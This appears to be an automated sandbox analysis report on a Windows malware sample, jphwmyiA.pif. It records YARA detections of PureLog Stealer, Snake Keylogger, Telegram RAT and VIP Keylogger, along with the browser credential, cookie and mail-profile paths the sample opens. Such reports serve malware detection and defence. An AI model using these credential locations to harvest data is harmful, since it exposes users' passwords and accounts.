Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_0283918C GetLocalTime,

8_2_0283918C

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_0283B70C GetVersionExA,

8_2_0283B70C

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3446215142.0000000027271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3446220044.000000002B461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3446431807.000000001B4F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 5476, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 5476, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\Libraries\jphwmyiA.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3446215142.0000000027271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3446220044.000000002B461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3446431807.000000001B4F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6396, type: MEMORYSTR
